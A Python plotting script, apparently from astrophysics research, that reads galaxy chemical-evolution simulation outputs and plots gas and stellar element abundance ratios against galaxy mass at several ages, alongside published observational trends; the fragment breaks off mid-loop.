# plot_at_age = [1 * 10 ** 8, 1 * 10 ** 9, 9 * 10 ** 9, 10 * 10 ** 9, 11 * 10 ** 9]
plot_at_age = [5 * 10 ** 7, 1 * 10 ** 8, 5 * 10 ** 8, 1 * 10 ** 9, 1 * 10 ** 10]
length_plot_at_age = len(plot_at_age)
# Dabringhausen 2008 eq.4
Dabringhausen_2008_a = 2.95
Dabringhausen_2008_b = 0.596
gravitational_binding_energy_list = []
Number_of_SN_at_all_time_step_list = [[]]
Gas_Fe_over_H_at_all_step_list = [[]]
Star_Fe_over_H_at_all_step_list = [[]]
Gas_Mg_over_H_at_all_step_list = [[]]
Star_Mg_over_H_at_all_step_list = [[]]
Gas_O_over_H_at_all_step_list = [[]]
Star_O_over_H_at_all_step_list = [[]]
Gas_Mg_over_Fe_at_all_step_list = [[]]
Star_Mg_over_Fe_at_all_step_list = [[]]
Gas_O_over_Fe_at_all_step_list = [[]]
Star_O_over_Fe_at_all_step_list = [[]]
Gas_metallicity_at_all_step_list = [[]]
Star_metallicity_at_all_step_list = [[]]
i = 0
while i < length_plot_at_age - 1:
Number_of_SN_at_all_time_step_list.append([])
Gas_Fe_over_H_at_all_step_list.append([])
Star_Fe_over_H_at_all_step_list.append([])
Gas_Mg_over_H_at_all_step_list.append([])
Star_Mg_over_H_at_all_step_list.append([])
Gas_O_over_H_at_all_step_list.append([])
Star_O_over_H_at_all_step_list.append([])
Gas_Mg_over_Fe_at_all_step_list.append([])
Star_Mg_over_Fe_at_all_step_list.append([])
Gas_O_over_Fe_at_all_step_list.append([])
Star_O_over_Fe_at_all_step_list.append([])
Gas_metallicity_at_all_step_list.append([])
Star_metallicity_at_all_step_list.append([])
(i) = (i + 1)
##########################
raw_data = []
i = 0
while i < len(log_SFR):
if SFEN == []:
file = open(
'simulation_results/imf:{}-SFE:{}-log_SFR:{}.txt'.format(IMF, SFE[i], log_SFR[i]),'r')
else:
file = open('simulation_results/imf:{}-SFE:{}-log_SFR:{}-SFEN:{}.txt'.format(IMF, SFE[i], log_SFR[i], SFEN[i]), 'r')
# file = open('simulation_results_0.1Gyr/imf:igimf-SFE:{}-log_SFR:{}.txt'.format(SFE[i], log_SFR[i]), 'r')
raw_data.append(file.readlines())
file.close()
(i) = (i+1)
k = 0
while k < len(raw_data):
total_mas_in_box = float(raw_data[k][13])
total_mas_in_box_list.append(math.log(total_mas_in_box, 10))
final_stellar_mass = float(raw_data[k][7])
final_stellar_mass_list.append(final_stellar_mass)
final_stellar_mass_list_dif.append(10**final_stellar_mass/total_mas_in_box)
final_dynamical_mass = float(raw_data[k][11])
final_dynamical_mass_list.append(final_dynamical_mass)
final_dynamical_mass_list_dif.append(10**final_dynamical_mass/total_mas_in_box)
log_sigma = math.log(0.86, 10) + 0.22 * final_dynamical_mass
LumDyn_list.append(log_sigma)
expansion_factor = 5 # the expansion_factor should be a function of galaxy final_stellar_mass
# and rise with the mass
# See Kroupa 2008 for instantaneous and adibatic expansion
log_binding_energy = round(
math.log(4.3 * 6 / 5, 10) + 40 + (2 - Dabringhausen_2008_b) * math.log(total_mas_in_box, 10)
- math.log(Dabringhausen_2008_a, 10) + 6 * Dabringhausen_2008_b +
math.log(expansion_factor, 10), 1)
gravitational_binding_energy_list.append(log_binding_energy)
time = [float(x) for x in raw_data[k][15].split()]
Number_of_SN = [math.log(float(x), 10) for x in raw_data[k][17].split()]
Gas_Fe_over_H = [float(x) for x in raw_data[k][19].split()]
Star_Fe_over_H = [float(x) for x in raw_data[k][21].split()]
Gas_Mg_over_Fe = [float(x) for x in raw_data[k][23].split()]
Star_Mg_over_Fe = [float(x) for x in raw_data[k][25].split()]
Gas_O_over_Fe = [float(x) for x in raw_data[k][27].split()]
Star_O_over_Fe = [float(x) for x in raw_data[k][29].split()]
Gas_Mg_over_H = [float(x) for x in raw_data[k][31].split()]
Star_Mg_over_H = [float(x) for x in raw_data[k][33].split()]
Gas_O_over_H = [float(x) for x in raw_data[k][35].split()]
Star_O_over_H = [float(x) for x in raw_data[k][37].split()]
Gas_metallicity = [float(x) for x in raw_data[k][39].split()]
Star_metallicity = [float(x) for x in raw_data[k][41].split()]
plot_at_age_time_index = []
j = 0
while j < length_plot_at_age:
i = 0
while i < len(time):
if time[i] == plot_at_age[j]:
plot_at_age_time_index.append(i)
(i) = (i + 1)
(j) = (j + 1)
i = 0
while i < length_plot_at_age:
Number_of_SN_at_all_time_step_list[i].append([Number_of_SN[plot_at_age_time_index[i]] + 52])
Gas_Fe_over_H_at_all_step_list[i].append(Gas_Fe_over_H[plot_at_age_time_index[i]])
Star_Fe_over_H_at_all_step_list[i].append(Star_Fe_over_H[plot_at_age_time_index[i]])
Gas_Mg_over_H_at_all_step_list[i].append(Gas_Mg_over_H[plot_at_age_time_index[i]])
Star_Mg_over_H_at_all_step_list[i].append(Star_Mg_over_H[plot_at_age_time_index[i]])
Gas_O_over_H_at_all_step_list[i].append(Gas_O_over_H[plot_at_age_time_index[i]])
Star_O_over_H_at_all_step_list[i].append(Star_O_over_H[plot_at_age_time_index[i]])
Gas_Mg_over_Fe_at_all_step_list[i].append(Gas_Mg_over_Fe[plot_at_age_time_index[i]])
Star_Mg_over_Fe_at_all_step_list[i].append(Star_Mg_over_Fe[plot_at_age_time_index[i]])
Gas_O_over_Fe_at_all_step_list[i].append(Gas_O_over_Fe[plot_at_age_time_index[i]])
Star_O_over_Fe_at_all_step_list[i].append(Star_O_over_Fe[plot_at_age_time_index[i]])
Gas_metallicity_at_all_step_list[i].append(Gas_metallicity[plot_at_age_time_index[i]])
Star_metallicity_at_all_step_list[i].append(Star_metallicity[plot_at_age_time_index[i]])
(i) = (i + 1)
(k) = (k+1)
##########################
# Plot #
##########################
if x_axis == "dynamical":
mass_list = final_dynamical_mass_list
elif x_axis == "luminous":
mass_list = final_stellar_mass_list
elif x_axis == "LumDyn":
mass_list = LumDyn_list
elif x_axis == "SFR":
mass_list = log_SFR
# #################################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(0, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
#
# plt.plot([log_SFR[0], log_SFR[-1]], [total_mas_in_box_list[0], total_mas_in_box_list[-1]], ls="dotted", c="k", label=r'M$_{galaxy}$=M$_{baryon}$')
# plt.plot([log_SFR[0], log_SFR[-1]], [total_mas_in_box_list[0]-0.301, total_mas_in_box_list[-1]-0.301], ls="dashed", c="k", label=r'M$_{galaxy,ini}$')
# plt.plot(log_SFR, final_dynamical_mass_list, label='dynamical (alive+remnant)')
# plt.plot(log_SFR, final_stellar_mass_list, label='luminous (alive)')
#
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# # plt.xlabel(r'log$_{10}$(M$_{baryon}$) [M$_\odot$]')
# plt.ylabel(r'log$_{10}$(M$_{galaxy}$) [M$_\odot$]')
#
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
#
# #################################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(-1, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
#
# plt.plot([log_SFR[0], log_SFR[-1]], [1, 1], ls="dashed", c="k", label=r'M$_{galaxy}$=M$_{baryon}$')
# plt.plot([log_SFR[0], log_SFR[-1]], [0.5, 0.5], ls="dotted", c="k", label=r'M$_{galaxy,ini}$')
# plt.plot(log_SFR, final_dynamical_mass_list_dif, label='dynamical (alive+remnant)')
# plt.plot(log_SFR, final_stellar_mass_list_dif, label='luminous (alive)')
#
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# # plt.xlabel(r'log$_{10}$(M$_{baryon}$) [M$_\odot$]')
# plt.ylabel(r'M$_{galaxy}$/M$_{baryon}$')
#
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
# ##########################
# # Plot energy #
# ##########################
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(1, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(mass_list, gravitational_binding_energy_list, ls='dashed', c='k',
# label='Gravitational binding energy')
# plt.plot([], [], c="k", label='SN energy at different time')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[4], c="brown", label='10 Gyr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[3], c="red", label='1 Gyr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[2], c="orange", label='500 Myr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[1], c="green", label='100 Myr')
# plt.plot(mass_list, Number_of_SN_at_all_time_step_list[0], c="blue", label='50 Myr')
#
# if x_axis == "dynamical":
# plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
# elif x_axis == "luminous":
# plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
# elif x_axis == "LumDyn":
# plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
# elif x_axis == "SFR":
# plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
# plt.ylabel('Energy [erg]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# # plt.ylim(-3, 0.5)
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
##########################
# Plot [Z/H] #
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(2, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot([1, 3], [0, 0], ls='dotted', lw=1, label='Solar Value')
plt.plot([1.8, 2.4], [0.02, 0.16], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012 421-1908
plt.plot([1.8, 2.4], [-0.2, 0.2], ls='dashed', c='k', lw=1, label='Thomas 2010') # Thomas 404, 1775–1789 (2010)
plt.plot([2.1, 2.5], [0.1, 0.3], ls='dashed', c='k', lw=1, label='Thomas 2005') # Thomas 621:673–694, 2005
plt.plot([2.0, 2.4], [-0.168, 0.1984], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
plt.plot([2.0, 2.4], [0.02, 0.378], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
if plot_gas == 1:
plt.plot(mass_list, Gas_metallicity_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_metallicity_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_metallicity_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_metallicity_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_metallicity_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_metallicity_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_metallicity_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_metallicity_at_all_step_list[0]):
mid0.append((Gas_metallicity_at_all_step_list[0][i] + Star_metallicity_at_all_step_list[0][i]) / 2)
mid1.append((Gas_metallicity_at_all_step_list[1][i] + Star_metallicity_at_all_step_list[1][i]) / 2)
mid2.append((Gas_metallicity_at_all_step_list[2][i] + Star_metallicity_at_all_step_list[2][i]) / 2)
mid3.append((Gas_metallicity_at_all_step_list[3][i] + Star_metallicity_at_all_step_list[3][i]) / 2)
mid4.append((Gas_metallicity_at_all_step_list[4][i] + Star_metallicity_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Z/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Fe/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(3, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.9, 2.5], [-0.07, 0], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.9, 2.5], [-0.17, 0.03], ls='dashed', c='k', lw=1, label='Graves 2008') # Graves & Schiavon 2008
plt.plot([1.8, 2.6], [-0.07, -0.1], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1, 1.7, 2.5], [-1.5, 0, 0], ls='dashed', c='k', lw=1, label='Koleva 2011') # Koleva et al. 417, 1643–1671 (2011)
plt.plot([2, 2.5], [-0.24, 0], ls='dashed', c='k', lw=1, label='Graves 2007') # Graves et al. 671:243-271, 2007
plt.plot([1.7, 2.48], [0, 0], ls='dashed', c='k', lw=1, label='Eigenthaler 2013') # Eigenthaler & Zeilinger2 A&A 553, A99 (2013)
if plot_gas == 1:
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Fe_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Fe_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Fe_over_H_at_all_step_list[0]):
mid0.append((Gas_Fe_over_H_at_all_step_list[0][i] + Star_Fe_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Fe_over_H_at_all_step_list[1][i] + Star_Fe_over_H_at_all_step_list[1][i]) / 2)
mid2.append((Gas_Fe_over_H_at_all_step_list[2][i] + Star_Fe_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Fe_over_H_at_all_step_list[3][i] + Star_Fe_over_H_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Fe_over_H_at_all_step_list[4][i] + Star_Fe_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Fe/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Mg/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(4, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3,
label='Solar Value')
if plot_gas == 1:
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Mg_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Mg_over_H_at_all_step_list[0]):
mid0.append((Gas_Mg_over_H_at_all_step_list[0][i] + Star_Mg_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Mg_over_H_at_all_step_list[1][i] + Star_Mg_over_H_at_all_step_list[1][i]) / 2)
mid2.append((Gas_Mg_over_H_at_all_step_list[2][i] + Star_Mg_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Mg_over_H_at_all_step_list[3][i] + Star_Mg_over_H_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Mg_over_H_at_all_step_list[4][i] + Star_Mg_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Mg/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Mg/Fe] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(5, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.94, 2.48], [0.05, 0.22], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.94, 2.48], [0.12, 0.27], ls='dashed', c='k', lw=1, label='Graves 2008') # Graves & Schiavon 2008
plt.plot([1.8, 2.48], [0.13, 0.33], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1.5, 2, 2.48], [-0.24, 0.1, 0.34], ls='dashed', c='k', lw=1, label='Recchi 2009') # Recchi 2009
if plot_gas == 1:
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Mg_over_Fe_at_all_step_list[0]):
mid0.append((Gas_Mg_over_Fe_at_all_step_list[0][i] + Star_Mg_over_Fe_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Mg_over_Fe_at_all_step_list[1][i] + Star_Mg_over_Fe_at_all_step_list[1][i]) / 2)
mid2.append((Gas_Mg_over_Fe_at_all_step_list[2][i] + Star_Mg_over_Fe_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Mg_over_Fe_at_all_step_list[3][i] + Star_Mg_over_Fe_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Mg_over_Fe_at_all_step_list[4][i] + Star_Mg_over_Fe_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Mg/Fe]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [O/Fe] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(6, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.94, 2.48], [0.03, 0.28], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.8, 2.4], [0.1, 0.25], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1.5, 2, 2.48], [-0.24, 0.1, 0.34], ls='dashed', c='k', lw=1, label='Recchi 2009') # Recchi 2009
if plot_gas == 1:
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_O_over_Fe_at_all_step_list[0]):
mid0.append((Gas_O_over_Fe_at_all_step_list[0][i] + Star_O_over_Fe_at_all_step_list[0][i]) / 2)
mid1.append((Gas_O_over_Fe_at_all_step_list[1][i] + Star_O_over_Fe_at_all_step_list[1][i]) / 2)
mid2.append((Gas_O_over_Fe_at_all_step_list[2][i] + Star_O_over_Fe_at_all_step_list[2][i]) / 2)
mid3.append((Gas_O_over_Fe_at_all_step_list[3][i] + Star_O_over_Fe_at_all_step_list[3][i]) / 2)
mid4.append((Gas_O_over_Fe_at_all_step_list[4][i] + Star_O_over_Fe_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[O/Fe]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [O/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(7, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3,
label='Solar Value')
if plot_gas == 1:
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_O_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_O_over_H_at_all_step_list[0]):
mid0.append((Gas_O_over_H_at_all_step_list[0][i] + Star_O_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_O_over_H_at_all_step_list[1][i] + Star_O_over_H_at_all_step_list[1][i]) / 2)
mid2.append((Gas_O_over_H_at_all_step_list[2][i] + Star_O_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_O_over_H_at_all_step_list[3][i] + Star_O_over_H_at_all_step_list[3][i]) / 2)
